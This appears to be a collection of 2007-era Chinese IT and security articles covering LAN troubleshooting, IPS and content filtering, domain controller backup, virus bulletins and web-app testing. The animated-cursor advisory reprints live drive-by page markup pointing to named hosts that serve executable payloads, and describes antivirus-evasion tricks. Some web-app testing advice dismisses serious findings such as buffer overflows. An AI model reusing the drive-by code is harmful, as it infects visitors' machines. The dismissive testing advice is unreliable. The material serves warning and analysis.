处理局域网网络故障 切勿舍近求远

处理局域网网络故障 切勿舍近求远

半年前单位的局域网里采购了一批IBM的原装品牌机，配置为P4 2.4GB， 256MB DDR内存，80GB硬盘，还装有一套原配的Windows XP系统，整体看来颇为高档。我有幸分得一台，在局域网里运行了半载有余，基本上相安无事。不想在最近运行过程中出现的一个“微不足道”的网络故障，却折腾了我整个一上午，也让我从中体会到了“舍近求远”的味道。

　　故障现象

　　一日早晨上班开机，Windows XP系统正常启动后，顺手打开Internet Explorer浏览器，输入新浪网址想好好浏览一下当日的新闻快报，却发现IE浏览器的窗口里空空如也。认真一查，发现IE提示为“DNS错误”，刷新几次都是如此—看来网络出问题了。

　　故障处理

　　首先怀疑的当然是DNS服务器了，于是赶忙启动系统的“控制面板→网络连接→网络属性”菜单，点选其中的TCP/IP协议，查看罗列其中的DNS列表，发现配置并没有错误，打了个电话给当地的ISP机房热线，回答是出奇的肯定:DNS No Problem! 难道是我的网络或系统出了故障吗?

　　大概是最近病毒泛滥成灾的源故吧，我又想到是否我的机子染了病毒或木马，于是马上拿出最新的防毒软件和防火墙软件，一阵穷追猛打，结果是病毒一个也没有，网站仍然登不上去。

　　这时我开始怀疑机子的网络配置出了问题，于是点“开始”菜单里的“运行”项，在其中输入cmd并回车，进入了DOS命令行窗口，在其中敲入“Ipconfig /all”回车。这时本机的网卡状态，包括MAC地址，IP地址，地址掩码，网关地址及DNS服务器等一干关键参数全部罗列出来，我左顾右盼也没发现任何差错。看来问题不在软件上，而是硬件有麻烦了。

　　无意中我查看了一下桌面右下角图标的网络状态，发现网络的发送/接收数据包数目居然都是0!这怎么可能?难道是网卡不行了?可是网络右下角的连通状态提示分明给出了“以10M速度连接”的提示，而我在“运行”窗口中敲入“Ping 127.0.0.1”作回环测试，也报告一切正常。于是我理所当然地将网卡故障的可能性排除在外。

转念我又把矛头指向了单位局域网中那台价低位廉、年久失修的交换机上。跑过去一看，嘿!果然不出所料，连接我的桌面电脑的交换机端口指示灯居然不亮!难道这就是问题的根源?可是去问问同事，大伙儿异口同声表示上网正常，这表明这台年迈的交换机还健康长寿，再将同事所用的交换机端口与我互换，他们仍能正常上网，这表明交换机上与我机子相连的接口亦无问题，这下惟一的希望就在连通网卡与交换机之间的网线上了。

　　由于平时用此网线上网一直正常，因此对它的接线配对无可怀疑，惟一的可能或许是器件老化及经常拔插导致接触不好，四处奔波借来一个网线连通测试仪一测，接近100MB的良好连通性差点让我气歪了嘴!看着网络状态上几乎凝固了的“0”数据包收发，百般无奈之中抱着试试看的想法打开了机箱，看着固化在主板上的那个网卡，烦乱中我用手狠狠地敲了它两下——没想到奇迹发生了!网络状态上的收发数据包计数从“0”变成了“10”，“90”，“200”……顺手打开IE浏览器，一个个熟悉的网站顿时映入眼帘!原来故障的源头竟是这最不放在心上的网卡!它与主板的牢固粘合导致软件测试时报告一切正常，而它在与网线接口处的微小松动却使得网络在物理上已完全隔离，这导致了交换机上显示连通的指示灯熄灭，而数据包的收发当然也无从谈起了!

　　故障体会

　　尽管问题最后得到了解决，但一个宝贵的上午已经过去。痛定思痛我有一些心得。网络故障的测试往往比较复杂，比起一些系统软硬件故障来，它还有一个空间的跨度需要克服。我们在解析时，应抱着先软后硬，由近及远的原则，利用逐一排除及替换法分别进行排查。那种放着眼前的错误不顾，而四处寻找故障之源的办法显然是舍近求远，其问题纵然解决了也是事倍功半。一言以蔽之，那就是:不要忽视了那些近在咫尺的小毛病，因为它们可能就是故障的源头!

防患未然Juniper入侵防护系统解决方案

作者：hanbin　来源：赛迪网技术社区

无论是源自内部还是外部的网络攻击，都变得日益复杂且难以防范。这些攻击从网络漏洞和应用薄弱环节中乘虚而入，或使用多种方法来窃取数据、修改或损坏资源、发起其它攻击或全面控制网络。

客户面临的问题

无论是源自内部还是外部的网络攻击，都变得日益复杂且难以防范。这些攻击从网络漏洞和应用薄弱环节中乘虚而入，或使用多种方法来窃取数据、修改或损坏资源、发起其它攻击或全面控制网络。为了帮助保护网络，某些防火墙提供了基本的拒绝服务和暴力攻击防护功能，但他们并非设计用于执行深入的流量分析。另一方面，入侵检测解决方案(IDS)只能为企业提供被动防护功能，因为这种防护只是在攻击发生后才能检测到攻击并通知企业。这使企业不得不调查每一次攻击，不管是攻击是成功的还是失败的，因为攻击在很多情况下都会到达攻击目标。最后，许多IDS不能识别每一种新的攻击，因为它们只使用一种或两种检测方法来检测攻击。

为了更成功地保护网络，使他们免遭日益增多且日益复杂的攻击威胁，企业需要能够准确地检测攻击并防止他们在网络中造成损坏。由于不同类型的攻击采用不同的攻击方式，而且对于每一种攻击都要求使用不同的机制来识别其独特特征，所以企业需要一种能够检测到最多攻击类型的设备。此外，企业还需要一种能够根据企业定义的策略对攻击立即采取应对措施的设备，以便在应对攻击的过程中不会浪费时间和资源。

Juniper网络公司的入侵防护解决方案

Juniper网络公司创新的入侵防护解决方案(名为Juniper网络公司NetScreen-IDP)可以提供准确的攻击检测、有效的攻击保护和简化的管理。Juniper网络公司发明了只在流量的相关部分来查找攻击模式的状态式签名，能够深入到具体业务字段来进行攻击检测，以实现精确的攻击识别。除了状态式签名外，Juniper网络公司还推出了多方法检测，结合了8种不同的检测机制来提供最全面的攻击检测和防护。Juniper网络公司还推出第一种能够在线运行并丢弃发起攻击的数据包或连接的产品，使攻击永远不会到达攻击目标或影响网络。NetScreen-IDP解决方案还可以通过一种基于角色的集中方法轻松地进行管理，使管理员可以迅速部署解决方案并精确地控制它的运行行为。NetScreen-IDP还可以提供集成事件管理，使企业可以获得所需的信息来做出正确的安全性决策。

清洁网络需要做好内容过滤

清洁网络需要做好内容过滤

作者：张勇　来源：赛迪网－中国电脑教育报

当前，内容过滤正在成为越来越热门的话题。据IDC的分析统计预测，作为安全领域的一个重要分支，今年，内容安全市场的市值将达到６５亿美元。内容过滤仿佛成了万能良药，能够解决互联网带来的一切的内容相关问题。市场上的防火墙、路由器、交换机、邮件网关、代理服务器等网络产品几乎都已经加入了内容过滤的功能。每个厂商都提供不同的产品，而且有着迥然不同的技术观点和宣传方式。另外，电信运营商也在进行着内容过滤，这是和每一个网民都息息相关的。那么，我们不仅要问，到底什么才是内容过滤，如何才能够有效的进行内容过滤，内容安全的明天又是什么样子呢？本文从技术的角度对内容过滤进行分析，以飨读者。

企业网络内容过滤

在每一个互联网访问的网络边缘（企业/学校网络边缘、网吧网络出口），都可以部署内容过滤工具。这些工具一般是分析网络数据流中包含的HTTP数据包，对数据包头中的IP地址、URL、文件名、HTTP methods进行访问控制。

在网络边缘的内容过滤产品有两种表现方式，旁路式（Passby）和穿透式（Passthrough）。旁路式内容过滤产品是独立的，它监听网络上所有信息，并有选择的对基于TCP的连接进行阻断。穿透式内容过滤产品依赖于其他网络边缘处的基础平台。穿透式内容过滤产品根据网络边缘接入基础平台的访问请求，作出允许或禁止的判断，然后由这些平台执行过滤的动作。



旁路式



穿透式

那么，内容过滤产品如何作出允许或禁止的判断呢？不同的厂商有着不同的解决方案。从理论上来讲，最理想的产品能够实时对网页内容进行分析，然后判断是否允许用户访问。例如，用户访问一个色情网站，内容过滤产品分析这个网站中页面的内容，发现其中包含了大量的色情词汇和图片信息，从而判断这是一个不良网站需要进行过滤。这是一个理想的状态。但是，在具体的生产应用环境当中，实时分析网页内容并进行过滤是不现实的，这个问题主要体现在对网页内容实时分析给用户浏览体验带来的延时是不可以接受的。对文字内容进行比较分析需要大量的计算资源，更不用说图片信息。试想一下每一个用户每点击一个链接都要等待数十秒钟，这还是比较好的情况。一般的企业网络内每秒钟都会有数个到数十个HTTP连接建立，这对实时的内容分析来说是不可完成的任务。

所以，绝大部分的厂商采取了一个折中的办法，他们事先对访问量较大、名气较大的网站和网页的内容做分类的工作，然后把URL、IP地址和内容分类对应起来。当用户访问这些网站上的页面时，内容过滤产品就可以根据事先的分类进行过滤，达到按内容过滤的目的。

互联网骨干网络过滤

内容过滤除了在个人电脑和企业网络中的应用，在互联网骨干上也可以实现相同的功能。互联网骨干的主要任务是在保证可连通性的同时，尽可能快速的提供数据交换通道，这就要求网络结构和配置尽可能简单。属于网络高层应用的内容过滤本来不应该在互联网骨干上部署实施。但是，出于国家安全的需要，对一些网站还是需要进行屏蔽。电信运营商在互联网骨干上使用的内容过滤技术主要是DNS过滤和IP地址过滤：互联网骨干DNS服务器拒绝解析指定URL列表；通过ACL拒绝到指定IP地址的连接。这些手段轻微的影响互联网性能，但是技术和现实中也是可以实现和接受的。

另外，现在中国有些地区的宽带运营商还提供“绿色上网”服务，为申请此项服务的用户提供内容过滤的功能，以保护青少年和儿童。这些“绿色上网”服务的原理同以上的内容过滤原理是一样的，不同之处在于每个用户的可定制化功能。还有些运营商采取了“投诉”的方式来维护更新不良内容网址，通过奖励上网费用和时间的方式来鼓励宽带用户投诉不良网站。这也是一个很好的思路和现实的做法。

技术难点和技术趋势

从以上过滤手段来看，它们都受制于内容分类的效率和准确性。如何提高内容分类的效率和准确性，是各个厂商钻研的难题。

实际上，每个月都有新注册的超过100万个网站出现在互联网上，也就是说互联网是变化的，这种变化是永不停息的。我们不可能把所有的网站和网页都进行归类并放在数据库当中，这样的话，这个数据库的规模将会远远超过实际应用中硬件平台性能所能承受的最大限制。最好的办法还是挑选一部分网站放在数据库当中，这些网站至少具有两个特征：访问量比较大；包含不良内容。对于那些访问量不大，或者内容“不咸不淡”的网站，大可以忽略不计。

在变化之外，每个企业或者每个人的浏览习惯都是不一样的，也可能有些人特别喜欢浏览一些冷门的网站，这就涉及一个个性化的问题。为了对这些访问进行控制和过滤，内容过滤产品本身还要具有一定的智能，能够自动分析归类这些网站的内容，并对用户的访问进行过滤。这样的分析结果应该保留在访问者的本地内容过滤设备上，而不是上传同步到所有的用户。这样的话，所有用户就有一个集中的公共数据库，包含了绝大部分热门网站；每个用户还有一个分散的私人数据库，包含了自己的浏览分析归类数据。

网络管理更轻松：域控制器的备份和恢复

网络管理员的重要任务是什么呢?保持网络畅通、防止病毒、优化网络都只算是一般性的工作。其实网络管理员的重要任务是保证网络中所有数据的安全，当数据出现问题后可以用最快的方式来恢复。

　　对于现在的企业网络，管理员都会在网络中启动配置域控制器，域控制器的好处是可以帮助网络管理员轻松地管理网络中的电脑和用户，防止用户进行非法操作。当一台域控制器崩溃后，如果说网络中的电脑和用户不多，那么还可以通过重新配置的方法来处理，如果网络中有上百台电脑怎么办，你难道可以记得原来的所有配置吗?那么唯一的方法是在对域控制器进行每次配置后，都做一次备份。下面就告诉大家如何进行域控制器的备份和恢复。

　　正确备份

　　要对域控制器备份我们可以购买专门软件，但是这些软件相当昂贵，老总通常是不愿意花这些钱的。那么只有用Windows自带的备份工具来处理。这里以Windows 2003进行讲解，在Windows 2000中的操作方法相同。

　　1.点击“开始/程序/附件/系统工具/备份”，将启动备份窗口。

　　2.在窗口中点击“高级模式”，随后再点击“备份向导(高级)”，这样就打开了高级模式备份窗口(图1)。和此窗口同时显示的还有一个向导提示窗口，在这个窗口中直接点“取消”，这样可以进入备份域控制器，以便进行更灵活的操作。



图1　高级模式备份窗口

　　3.通常来说域控制器的备份应该是包含活动目录和系统所在的分区，但是如果你的系统不是安装在C盘，那么除了备份系统分区外，还必须对C盘进行备份，因为当系统安装在其他盘中时，在C盘中会有引导程序。要进行备份只要选中相关的磁盘和System State即系统状态即可。

　　然后在左下角的“备份媒体或文件名”里选择备份的路径，选择好后点击“开始备份”即可。随后会出现如图2所示窗口。



图2　开始备份

　　4.如果希望系统可以在指定的时间进行自动备份，可以在图2中点击“计划”，将此备份设置进行保存，然后输入管理员密码后点“确定”，就会出现一个“计划的作业选项”窗口，在此窗口中输入作业的名字，也就是计划的名字，然后点“属性”，在属性窗口中就可以设置自动备份的时间了，当设置好后可以点击“确定”进行保存。当然这不是必须的，只是为了减少管理员的工作而制定的一种备份方案。

　　5.返回图2中点击“高级”，在高级窗口中的“备份类型”中选择正常，如果在前面设置了计划那么也该选择“正常”，如果使用其他方式备份会增加恢复操作的麻烦，最后选择“备份后验证数据”和“自动备份带有系统状态的系统保护文件”然后点击“确定”。

　　6.完成上面的操作后就可以点击图2中的“开始备份”按钮，当备份完成后你会发现文件相当的大，所以要提醒大家注意的是在前面设置备份文件保存位置的时候一定要选择一个磁盘空间大的磁盘。

　　轻松恢复

　　当服务器出现问题或重新安装系统后，就可以通过下面的方法进行恢复，但是重新安装后请不要将服务器提升为域控制器。

　　1.在开机的时候按F8，并选择第七项“目录服务还原模式(只用于Windows域控制器)”(图3)。



目录服务还原模式

　　2.在Windows的登录窗口输入本地管理员的密码。然后点击“开始/程序/附件/系统工具/备份”，将启动备份窗口，在备份窗口中点击“高级模式”，随后再点“还原向导(高级)”。此时会和还原窗口同时出现一个向导窗口，这次我们就不要关闭它，而是点“下一步”。

　　3.接着输入备份时文件的保存地址，直到完成，随后系统会开始恢复了，恢复完成后需要重新启动一次电脑。

　　通过上面的讲解，大家是不是认为很简单，其实数据的备份与恢复，在所有的企业级的软件上都没什么太难的，只是需要大家做一些简单的配置而已。

警惕微软动画光标暴露的漏洞

警惕微软动画光标暴露的漏洞

作者：金山　来源：赛迪网

3月29日，微软动画光标曝漏洞，同一时间，金山毒霸反病毒专家发现利用此漏洞的恶意攻击代码正在国内互联网中广泛传播。有此漏洞的Windows用户一旦登陆被植入恶意代码的网站，将自动下载大量病毒，从而遭受严重威胁。

金山毒霸反病毒专家戴光剑表示，该漏洞出在Windows 处理动画光标的方式上，该漏洞将影响包括Vista在内的Windows 所有版本。黑客通过带有恶意计算机代码的Web网页或电子邮件就可以利用该漏洞大肆传播病毒。而微软也已经确认此最新漏洞，但由于目前还没有推出相关的补丁，所以危险程度相当高。

截止到目前为止，国内已有十几家网站被黑客植入了恶意代码，用户一旦访问这些被黑客恶意篡改的网页，恶意程序将被自动下载到用户的IE临时目录中并得到执行。

金山毒霸反病毒专家提醒广大用户，提高自身的网络安全意识，不要登陆一些不知名的小网站；在打开陌生邮件以及IM聊天工具中传送的网络链接前，一定要开启杀毒软件的防火墙、实时监控等功能；关注微软补丁的发布时间或采用金山毒霸主动漏洞修复功能进行修补。

警惕新的鼠标指针文件漏洞，可能允许远程执行任意代码（windows 0day漏洞？）

这几天，我们在分析国内一些被挂马的网站的时候，发现一种新的网页挂马方式出现。

这些挂马网页利用鼠标指针文件下载并运行恶意程序，当用户访问嵌入了恶意代码的网页，恶意程序将被自动下载到用户的IE临时目录并得到执行。经海色分析，这很可能是一个新的漏洞，与MS05-002类似。由于目前微软尚未发布相关补丁，所以此漏洞威胁较大，如果恶意代码被广泛应用，近期通过挂马网页感染病毒的用户将陆续增加。

具体例子：

http://www.cw988.cn/jpg.htm

内容：具体例子：

http://www.cw988.cn/jpg.htm

内容：

＜!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4．0 Transitional//EN"＞

＜HTML＞＜HEAD＞＜META http-equiv=Content-Type content="text/html; charset=big5"＞

＜META content="MSHTML 6．00．2900．3059" name=GENERATOR＞＜/HEAD＞

＜BODY＞ ＜DIV style="CURSOR: url('http://www2．cw988．cn/1．jpg')"＞

＜DIV style="CURSOR: url('http://www2．cw988．cn/2．jpg')"＞＜/DIV＞＜/DIV＞＜/BODY＞＜/HTML＞

打开网页时http://www2．cw988．cn/1．jpg和http://www2．cw988．cn/2．jpg这两个图片将作为鼠标指针

然而，这真的只是两个一般的图片吗？

最简单的判别方法：将这两个图片下载下来，另存为.txt文件，再用记事本打开，你看到了什么？

在最后，http://www2.cw988.cn/avp.exe这个URL地址赫然在目！

当用户打开这个网页，或打开用框架等方法内嵌了这个网页的网站之后，这两个鼠标指针便会起作用，http://www2.cw988.cn/avp.exe将被下载到本机IE临时文件夹中并被运行。

另一个例子，就是昨天刚刚提到的木蚂蚁软件站被挂马时，该黑客使用连到含有恶意代码的网页：

http://web.77276.com/adv.js?showmatrix_num=056

今天该网页新增内容：

document.writeln("＜!DOCTYPE HTML PUBLIC \"-\/\/W3C\/\/DTD HTML 4.0 Transitional\/\/EN\"＞");

document.writeln("＜HTML＞＜HEAD＞");

document.writeln("＜META http-equiv=Content-Type content=\"text\/html; charset=big5\"＞");

document.writeln("＜META content=\"MSHTML 6.00.2900.3059\" name=GENERATOR＞＜\/HEAD＞");

document.writeln("＜BODY＞ ");

document.writeln("＜DIV style=\"CURSOR: url(\'http:\/\/web.77276.com\/muxiao1.jpg\')\"＞");

document.writeln("＜DIV ");

document.writeln("style=\"CURSOR: url(\'http:\/\/web.77276.com\/muxiao2.jpg\')\"＞＜\/DIV＞＜\/DIV＞＜\/BODY＞＜\/HTML＞")

同样是将两个jpg文件设置成的鼠标指针图案，而这两个文件的后部指向的URL地址，与之前一样，为http://do.77276.com/0.exe

附：

C.I.S.R.T的blog上文章：

http://www.cisrt.org/blog/read.php?301

微软对之前一个同类漏洞MS05-002描述的相关页面：

Microsoft Security Bulletin MS05-002

Vulnerability in Cursor and Icon Format Handling Could Allow Remote Code Execution (891711)

小聪感言：

当一般用户对“打开图片时会中毒”这种想法感到不可思议时，可能会被告知“把一个病毒exe程序和一个图片文件捆绑在一起，是非常简单的”。事实是如此，而且绝不仅仅是如此。从代码汇编级别入手，利用各式各样的溢出漏洞的方式，才是系统用户的噩梦。

特别是中国国内的黑客们，绝不能说他们缺乏想象力和创新性。实际上，各种各样的层出不穷的恶意代码加密方法，各种各样不同方式的漏洞利用方法，都是中国黑客创造性的极好体现。

从大处看，当MS06-014玩腻了，就换了MS07-004，甚至于“智能化判断”，先做一个MS06-014漏洞的测试，有这个漏洞的时候，便直接连到利用这个漏洞的网页。而无这个漏洞的时候，再依照操作系统的不同，分别连接到利用MS07-004漏洞的网页。而现在，这个鼠标指针文件的漏洞，又被中国黑客采用了，而些这个漏洞很可能是还未公开的，至今微软仍未发布相关补丁。

从小处来看，黑客们绝对不缺乏对付杀毒软件的技巧。从MS06-014漏洞利用代码的变化就可以看出。当瑞星的IE保护出来的时候，黑客闻风而动。在MS06-014漏洞利用代码上一个小小的改变，把直接运行.exe文件的行为，换成了本地创建或远程下载.vbs文件，利用.vbs文件中的代码来运行已下载的.exe文件，以利用IE保护不检测.vbs文件运行的特点，绕过IE保护。现在又出新招，不再由IE来运行了，而是转为用cmd.exe /c命令来运行，进一步逃避安全软件的监视。

以上的这一切，国内黑客的表现要比国外活跃得多了。

而现在这个鼠标指针文件漏洞，就更是体现了“社会工程学”的特点。单从百度空间上，我们就会发现很多百度空间加入了个性化的鼠标指针图标设置，包括我自己的blog也是这么做的。然而这卡通有趣的鼠标指针图案，一旦被人动了手脚，就成了这个用户防不胜防的安全漏洞。

新的漏洞利用方式出现了，网页挂马更加多层次和富于变化，进一步冲击普通用户的安全底线，同时也给反病毒厂商和民间反病毒者们提出了新的挑战。

近日在一些国内被挂马网站上发现了新的“形式”，利用鼠标指针文件下载并运行恶意程序，当用户访问嵌入了恶意代码的网页，恶意程序将被自动下载到用户的IE临时目录并得到执行，从我们目前收到的几个.ani样本看，可能这是新的鼠标指针漏洞，与

MS05-002

类似。由于目前MS尚无补丁发布，所以此漏洞威胁较大，如果恶意代码被广泛利用，近期通过挂马网页感染病毒的用户将陆续增加。

同时我们看到国外也有类似的情况出现：

McAfee:

Exploit-ANIfile.c

Unpatched Drive-By Exploit Found On The Web

TrendMicro:

TROJ_ANICMOO.AX

相关链接：

MS05-002

Vulnerability in Cursor and Icon Format Handling Could Allow Remote Code Execution (891711)

2007-03-29 23:25 更新：

新漏洞信息，FrSIRT:Microsoft Windows Cursor and Icon Format Handling Remote Code Execution Vulnerability。

MSN传播后门程序微软又现Excel图标蠕虫

作者：joy　来源：51CTO.c

在今天的病毒中“鼠星”变种、“代理木马”变种、“MSN幽灵”变种和“Excel拷贝虫”变种值得关注。"鼠星”变种cs是一个专门窃取各种网戏（如“天堂”、“仙境传说”、“热血江湖”等）玩家帐户、密码等机密信息的木马。“代理木马”变种ln是一个利用被感染的计算机转发垃圾邮件的木马。“MSN幽灵”变种A(Win32.Hack.ShadowBot.a)是一个通过MSN传播的后门黑客程序。“Excel拷贝虫”变种A(Worm.VVflag.a)是一个会伪装成Excel图标的蠕虫病毒。

病毒名称：Trojan/PSW.Maran.cs

中 文 名：“鼠星”变种cs

病毒长度：可变

病毒类型：木马

危害等级：★

影响平台：Win 9X/ME/NT/2000/XP/2003

Trojan/PSW.Maran.cs“鼠星”变种cs是一个专门窃取各种网络游戏（如“天堂”、“仙境传说”、“热血江湖”等）玩家帐户、密码等机密信息的木马。“鼠星”变种cs运行后，以任意文件名自我复制到Windows目录下，并在系统目录下释放*.dll文件，文件名随机生成。修改注册表，实现开机自启。终止与安全相关的进程，降低被感染计算机上的安全设置。记录用户键盘操作，窃取各种网络游戏玩家密码等机密信息，并将窃取的信息发送到黑客指定的站点。

病毒名称：TrojanProxy.Agent.ln

中 文 名：“代理木马”变种ln

病毒长度：可变

病毒类型：木马

危害等级：★★

影响平台：Win 9X/ME/NT/2000/XP/2003

TrojanProxy.Agent.ln“代理木马”变种ln是一个利用被感染的计算机转发垃圾邮件的木马。“代理木马”变种ln运行后，终止某些杀毒软件和防火墙的服务。创建文件svchost.exe，并自我注入到该进程里，逃避杀毒软件的查杀。修改注册表，躲避Windows防火墙的监视。窃取被感染的计算机上有效的邮箱地址，并将地址加密压缩，通过UDP 7975端口发送到黑客指定站点。开启后门，允许黑客未经授权访问用户计算机，通过TCP 80端口连接指定IRC服务器，利用被感染的计算机转发垃圾邮件。从黑客指定站点下载其它盗号木马，并在被感染的计算机上自动运行。另外，“代理木马”变种ln还可以利用网络共享进行传播。

“MSN幽灵”变种A(Win32.Hack.ShadowBot.a) 威胁级别：★

该病毒是近来网络流行的另一个恶意后门程序,它会通过网络聊天工具MSN给好友发送病毒压缩包,并以“我的新照片册子”等留言诱导用户打开该病毒包。若用户打开该压缩文件，它会立即释放一个后门程序，黑客便可以完全接管受感染电脑的所有功能，进行多个危害性操作，盗取电脑上的有效信息。由于它利用热门聊天软件进行传播，可能会造成短时间内的病毒的大面积扩散，甚至涉及国内外，严重破坏互联网的安全秩序。该病毒会通过MSN发送“Hey wanna see my new photo album?”和“hey man accept my new photo lbum..等相关内容。病毒包“photo zip”解压运行后，会释放rdshost.dll病毒文件，同时连接如下IRC服务器，完全受控于黑客。

“Excel拷贝虫”变种A(Worm.VVflag.a) 威胁级别：★

该病毒再出现新变种，跟之前的版本相似，它会利用用户电脑上Excel图标来伪装自身，使用户将它误以为是正常的Excel程序。当用户点击该图标时病毒就会自动运行，然后它会连接本地数据库，获取相关有效的数据信息。给用户的电脑的信息安全及隐私数据构成巨大的威胁。该病毒运行后，会把自身复制为session.exe等多个病毒。修改注册表，实现随开机自动启动。同时在每个磁盘根目录释放xls.exe和AUTORUN.INF病毒文件，当点击Excel图标，病毒便可自动运行。针对以上病毒，51CTO安全频道建议广大电脑用户：最好安装专业的杀毒软件进行全面监控。建议用户安装反病毒软件防止日益增多的病毒，用户在安装反病毒软件之后，应该经常进行升级、将一些主要监控经常打开（如邮件监控）、内存监控等，遇到问题要上报， 这样才能真正保障计算机的安全。建立良好的安全习惯。对一些来历不明的邮件及附件不要打开，不要上一些不太了解的网站、不要执行从Internet下载后未经杀毒软件处理的文件，这些才能确保您的计算机更安全。

1、请立即升级杀毒软件，开启高速杀毒引擎及各项监控，防止目前盛行的病毒、木马、有害程序或代码等攻击用户计算机

2、网络版的用户请及时升级控制中心，并建议相关管理人员在适当时候进行全网查杀病毒，保证企业信息安全

3、开启杀毒软件的“系统监控”功能，从注册表、系统进程、内存、网络等多方面对各种操作行为进行主动防御，可以第一时间监控未知病毒

入侵，全方位保护用户计算机系统安全

4、请勿随意打开邮件中的附件，尤其是来历不明的邮件

5、企业级用户可在通用的邮件服务器平台开启监控系统，在邮件网关处拦截病毒，确保邮件客户端的安全

6、怀疑已中毒的用户可使用免费在线查毒进行病毒查证

作者表示歉意但未能清除中国熊猫蠕虫

InfoWorld 【转载】

熊猫烧香不但肆虐在国内，在国外也是赫赫有名，据InfoWorld报道，Symantec的工程师Hon Lau在其blog中写道，作者Li Jun将蠕虫代码出售获利大约12876美元，使之传播开来。虽然其已经被拘捕，并表示道歉，但熊猫蠕虫所引发的损失已经无可挽回。并且，他在看守所中编写的代码未能有效阻止熊猫蠕虫的传播，很明显，编写一个病毒远远比挽回它的损失更简单。

病毒情书邮件藏温情 不爱红颜爱QQ！

DoNews 【转载】

“情书”充满了情人间的浓情蜜语，每个收到情书的人都会沉醉其中，而张小姐收到的这封“情书”却让她怎么也不能与“甜蜜”二字联系起来。

　　“今天我收到了一封邮件，附件中有一个名字为ILOVEYOU的word文档，我以为是谁发错了的情书，点开一看什么内容都没有，就在我纳闷的时候，杀毒软件就提示我，我的电脑已经感染了木马病毒，真是太可怕了！”张小姐说道。

　　据北京网络行业协会联合江民科技发布的反病毒播报资料显示，张小姐电脑中的是一种专盗QQ号的木马病毒（Trojan/PSW.QQPass），这个Word的文档是一个利用Office安全漏洞的恶意文档，如果用户的Office没有打过补丁，打开文档时就会自动释放并执行该木马病毒，盗取用户的QQ账号。

　　“Office文档在大多数网民的印象中是安全的、可靠的，给Office打补丁的用户要远远低于给Windows、IE打补丁的用户，甚至有很多用户从来都不知道需要给Office打补丁，更不知道电脑中有那些地方存在漏洞，这也就给了病毒制造者们利用该漏洞制造病毒的机会。因此及时检查系统漏洞，下载安装更新补丁就显得颇为重要。”江民反病毒专家何公道介绍道。

　　专家建议广大用户，不要随意打开陌生邮件，对有诱惑性标题的邮件尤为要提高警惕，上网时一定要打开杀毒软件的网页监控与邮件监控功能，及时升级杀毒软件病毒库。此外，由于大多数病毒都是针对系统漏洞编写的，因此用户要定期对电脑系统进行漏洞检查，及时下载安装漏洞补丁，江民杀毒软件的“系统漏洞检查”功能，可以有效地监测出系统存在的安全漏洞，并提供相应的补丁下载地址，用户可以直接下载补丁修补漏洞，不给病毒以可乘之机。

　　同时专家还指出，目前通过攻陷存在漏洞的网站在网页上种植木马已经成为黑客传播病毒的惯用手段，用户直接点击被恶意挂马的网站即可中毒，为了有效地遏制病毒的蔓延，江民公司特开展了“春天网络安全之旅”活动，推出“系统监测” 和“网页滤毒”两大技术，从根源上堵住病毒来源，确保电脑用户上网浏览网页安全。

对于网络应用的安全测试中什么最重要

对于网络应用的安全测试中什么最重要

作者：杜莉　来源：赛迪网

跟其他商业分析一样，网络应用的安全测试也有三个可能的结果：你的测试结果，你的漏洞评估以及真相。

不管用的是商用还是免费的扫描器，你都能收集到很多信息，从而发现这些网络应用的漏洞。问题是，其中可能有很多不是很严重的漏洞。无论营销方案还是precanned安全策略和报告，当需要从测试结果中整理出真正有威胁的漏洞时，你都应当从公司的网络，商业需求和能承受风险的大小这些方面来考虑。

网络安全应用测试工具极其聪明，它们能够在数分钟内发现那些世界上最好的黑客也需要花数小时，数月或者更多的时间才能找出的漏洞。当你拿到测试结果后，你需要决定什么才是至关重要的。某些没有经验的网络应用安全顾问、安全管理服务商以及审计员，他们在进行漏洞评估扫描后，直接把结果交给客户，并声称客户的系统有一大堆的漏洞需要修复。类似的，还有的网管看到测试工具找到的一大堆漏洞后大惊失色。他们会认为问题非常严重，并且立即跑去申请更多的预算来购置更多技术来解决这些问题。

即使你希望人们重视你的测试结果，你也无需用这样的方式表达，尤其是在你身为经理人或者开发人员的情况下。你得退一步，从全局角度考虑问题，结合公司的具体情况来分析这些评估结果。也就是说，你得换个角度（例如，从防火墙内侧而不是从外侧考虑）看待联机（或者通过漏洞连接）或者手动进行攻击的问题。

除非你的测试工具确实利用某漏洞进行了攻击，并将结果呈献给你，否则你必须深入研究漏洞评估的结果，并且确定什么才真正构成威胁。

下面是些网络应用安全漏洞的实例。你可以把这些情况称为假阳性，失察，妄想或者其他的——归根结底，它们都是表面上看起来很严重，但其实跟本不构成威胁。

漏洞评估发现1：发现SQL注入漏洞，它可能允许黑客访问数据库。

结果：进行适当的用户输入验证后，没有什么数据真的被人窃取。

漏洞评估发现2：由于没有在登陆页面上进行SSL（安全连接），会话ID和登陆信息是以文本形式发送的，黑客有可能截获这些信息。

结果：网管仍然没有在服务器上使用数字签名。

漏洞评估发现3：黑客有可能利用网络服务器软件的缓存溢出漏洞远程地在服务器上运行command命令行。

结果：使用可靠的防火墙和入侵检测系统后，服务器可以对所有传输开放而无需担心任何威胁。

漏洞评估发现4：微软FrontPage虚拟目录，FTP目录等等。

结果：设置适当的目录权限就可以阻止实际的访问。

漏洞评估发现5：发现带.old扩展名的备份文件，它有可能导致源码泄露和攻击。

结果：这些是以前的可执行文件，文档还有主页，跟安全威胁一点关系也没有。

漏洞评估发现6：安装了过期版本的Apache网络服务器，这将导致一系列漏洞以及对系统的无授权访问。

结果：系统中根本找不到Apache。

漏洞评估发现7：在Google黑客数据库（GHDB）中发现的文件，链接以及邮件地址能够泄露敏感信息。

结果：这些文件文件，链接以及邮件地址是网络应用进行操作时必须的。

漏洞评估发现8：人们可以通过访问Macromedia Dreamweaver远程数据库脚本来执行任意SQL查询。

结果：只有当用户以管理者/网管身份登陆的时候，他们才能够访问到这些文件。

有些漏洞看起来似乎是良性的，但是不考虑背景的话，人们还是有可能犯大错。比如，同一个漏洞在相对安全的网络应用中，跟处在监听不当的网络应用中安全性是完全不一样的，后者可能引发不必要的冲突，从而导致时间、精力以及金钱的浪费。

在考虑对网络应用的安全性进行测试和改进的时候，你应当集中关注最紧急最重要的问题。你得找出攻击者在你的公司的典型工作情景下能够利用的漏洞。到下周之前，你需要解决的是什么问题？哪些问题可以等一个月或者更长时间之后解决？哪些问题根本不需要解决？这些需要你结合自己公司的具体情况来考虑。不是说让你忽略其他问题，我们只是认为你得抓住主要矛盾而不是针对那些有可能永远不会被黑客们利用或者没有攻击价值的漏洞。

